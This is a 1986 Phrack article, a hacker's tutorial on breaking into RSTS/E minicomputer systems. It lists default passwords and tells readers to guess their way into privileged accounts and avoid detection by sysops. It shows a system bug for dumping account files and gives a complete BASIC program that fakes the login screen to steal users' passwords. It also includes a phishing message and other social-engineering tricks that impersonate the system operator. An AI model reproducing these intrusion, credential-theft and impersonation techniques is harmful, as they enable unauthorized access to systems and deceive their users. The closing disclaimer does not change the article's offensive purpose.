==Phrack Inc.== Volume One, Issue 7, Phile 5 of 10 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ PROGRAMMING RSTS/E $ $ File1: Passwords $ $ $ $ by: The Seker $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ Written (c) May 22, 1986 $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ PREFACE: -------- This document is first in a series of ongoing files about using the RSTS/E operating system. All the files are based on version 8.0 as it is almost fully compatible with the previous releases. If the need arises I have made sure to note differences between V8.x and V9.x. Credit goes to High Evolutionary for urging me to write these files; to Night Stalker for sharing info; and to all other RSTS hackers that have contributed in some way or another. HISTORY: -------- The RSTS/E (Resource System Time Sharing /Environment) operating system was developed for the PDP/11 series of minicomputers created by DEC. (Digital Equipment Corporation) It was developed with ease of use for the user (and hacker) in mind. Because of this, there have been a lot of overlooked errors leaving the system with quite weak security. In later versions, especially the 9.x series password security has been greatly improved and is more secure, but still has plenty of bugs for us to breach. LOGGING ON: ----------- Briefly.. locate a valid number and connect. Hit c/r (carriage return) a few times or type: HELLO The system should identify itself displaying to you who owns it, what version they're running under, the date, and the time. Then it will prompt for an account number and a password. Accounts are in a PPN (Project Program Number) format. This is actually two numbers each between 0 and 254 separated by a comma or a slash. (eg. 3,45 or 27/248) Privileged accounts which you should hopefully be striving for all start with a 1. So start hacking 1,x accounts. Passwords are 1-6 characters long. They are only alphanumeric so you don't have to worry about all that other shit being included. On V9.x systems passwords may be up to 8 characters if the operator has changed the default length. But this rarely ever happens as most ops are too lazy. Common passwords are: SYSLIB SYSGEN SYSCON SYSMGR SYSOPR SYSTEM OPRATR RSTS DECNET GAMES YYYYYY XXXXXX XYXYXY DATA RICH XXX AAA Many of those have been rumored to be defaults. But actually I think the true default (if there is one!) password is: RSTSE Also, accounts that have a password of: ?????? are only accessible by operators. Remember to try names, cars, objects, the name of the company (in different variations), etc. Cause most people generally pick passwords that have some relation to their private life.. Take a little time and guess... YOUR IN! -------- Once you have succeeded in hacking out a valid password, whether it be privileged or not, I suggest you find out who is logged onto the system. You can do this simply by typing: SY This will tell you everyone logged on, what they are doing at the moment, their job number, whether they are attached or detached, and a hell of a lot of other crap. What you are looking for is someone else logged in under the same account you are. If you find another user in the same account you hacked, log off and call back later. This will prolong the life of your account and prevent a rise in suspicion by the sysops. Remember, every system keeps a log of what you do, and if two people are logged in under the same account many times the sysops will delete or change the password to that account. If everything checks out okay, you're free to do as you please. To list the files in your allotted space type: DIR or to see all the files on the system type: DIR (*,*) NOTE: [ ] may be used in place of ( ) when dealing with files. * acts as a wildcard on the RSTS system and can be used in place of account numbers when searching for specific files. Speaking of searching for files; to run a file type: RUN filename.filetype where filename = the file you wish to run, and filetype = the extension. Experiment! Try what you will. If you ever need help just type: HELP Read the files contained within help. They are very detailed and I guarantee can help you with what ever it is you need done. One other thing, a few useful control characters are: ^C Breaks out of whatever your doing ^R Repeats last line typed ^X If ^C doesn't work, this may ^O Use to stop the flow of text without aborting the function in process ^T Tells status and runtime of terminal ^U Deletes line presently being typed in ^H Deletes characters ^S Transmission off ^Q Transmission on GAINING PRIVILEGES: ------------------- If you weren't able to hack out a privileged account don't panic. There are still a few other ways for you to attain sysop status. These methods may not always work, but they are worth a try. ]SYSTEM LOG[ On many RSTS/E systems before V9.0 there is one account dedicated to keeping the system log; everything you and everyone else does. I have found this account many times to be 1,101, 1,2, or 0,1 but you may want to do a directory find to make sure. Type: DIR (*,*)OPSER.LOG or if nothing appears from that type: DIR (*,*)SYSLOG.* or DIR (*,*) Look for a file similar in name to that and mark down the account it appears in. Now that you know which account the system log resides in logoff. BYE Then sign back on using the account in which the file was in. For password try one of the following: OPSER OPSLOG LOG OPS OOPS OPRATR SYSLOG SYSTEM These are common passwords to that account. If none of these work your out of luck unless you can think of some other password that may be valid. ]SYSTEM BUGS[ When operating systems as complex as RSTS/E are created there will undoubtedly be a few bugs in the operation or security. (Sometimes I am not sure if these are intentional or not.) These can often be taken advantage of. One that I know of is RPGDMP.TSK. To use this type: RUN (1,2)RPGDMP It will ask for a filename, and an output device. Give it any filename on the system (I suggest $MONEY, $REACT, or $ACCT.SYS) and it will be dumped to the specified device. (db1:, screen, etc). Credit for this goes to The Marauder of LOD for finding, exposing and sharing this bug with all. If you find any other bugs similar to this, I would appreciate your getting in touch with and letting me know. GETTING PASSWORDS: ------------------ Now that you've hopefully gotten yourself priv's we can get on with these files. Getting many passwords is a safety procedure, kind of like making a backup copy of a program. There are a number of ways to get yourself passwords, the easiest is by using privileges, but we will discuss that in a later file. The methods I am going to explain are the decoy and a trick I like to use, which I call the mail method. ]DECOY[ The decoy, commonly called a Trojan Horse, (which is something completely different) is a program which emulates login.bac. When the unsuspecting user enters his account and password you have your program store it into a file that you can retrieve later. Here is a short program I've written that will preform this task: type NEW and it will prompt for a filename. Enter something not to obvious. 1 ! RSTSE Decoy 2 ! Written by The Seker (c) 1986 TOK! 5 extend 10 print:print 20 &"RSTS V8.0-07 TOK Communications Ltd. Job 7 KB41 ";date$(0);" ";time$(0) 30 print 40 &"User: "; 50 open "KB:" for input as file 1 60 on error goto 300 70 input 1,proj%,prog% 80 z$=sys(chr$(3%)) 90 &"Password: "; 100 on error goto 300 110 input 1,pass$ 120 print:z$=sys(chr$(2%)) 130 close 1 140 open "SYSLIB.BAC" for output as file 2 150 print 2,proj% 160 print 2,prog% 170 print 2,pass$ 180 close 2 200 print:print 210 off$=sys(chr$(14%)+"bye/f"+chr$(13)) 300 if erl=70 then goto 350 310 if erl=110 then goto 360 350 &"Invalid entry - try again":z$=sys(chr$(2%)):try=try+1:if try=5 then goto 200 else resume 30 360 &"Invalid entry - try again":try=try+1:if try=5 then goto 200 else resume 90 999 end The program as I said emulates login.bac, then logs the person off after a few tries. Save this program. Then run it. When it starts, just drop the carrier. The next person to call within 15 minutes will get your imitation login. If you are working on an older system like V7.0 change line 40 to read: 40 &" "; NOTE: This will not work without modifications on releases after V8.7. An improved and updated version of this program will be released as a small file at a later date. Next time you login and you want to recover the file type: TYPE SYSLIB.BAC It should print out the account and password. If you set this running each time you plan on hanging up within a few days you'll have yourself a handful of valid accounts. ]MAIL[ To run mail type: RUN $MAIL The mail method is probably used by many hackers and since I like to use it, I thought I'd tell you what it was. When you run the program the utility will tell you exactly how to use itself. Assuming you know a little about it anyway we will get on with the file. The object is to send mail to another user and try and convince him/her you are the sysop and are writing him/her to validate their password. Don't try this with a priv'd user! It would result in instant deletion. Here's basically what you'd type: Hello. We are contacting each of the users and validating their records to keep our files up to date. If you would cooperate and leave me a response which includes your full name, account number, and password we would appreciate your help. John Doe System's Operator 4,11 As you can see the idea is to con a user into believing you are one of the system ops. I would say this method works approximately 70% of the time on most systems since users often times don't associate with sysops. Use a different name if you try this though, as John Doe wouldn't fool anyone. (Be creative) Also the 4,11 is the account you'd like them to leave the response too. You can try a few variations of this if you like. For example, if the system you're hacking has a chat program: RUN $TALK You can just talk live time to them. Or if you somehow (like trashing) manage to get a list of all the users and their phone numbers, you can call them up and bullshit them. NOTE: This document is intended for informational purposes only. The author is in no way responsible for how it is used. Sysops are free to display this at their will as long as no information within is altered and all acknowledgements go to The Seker.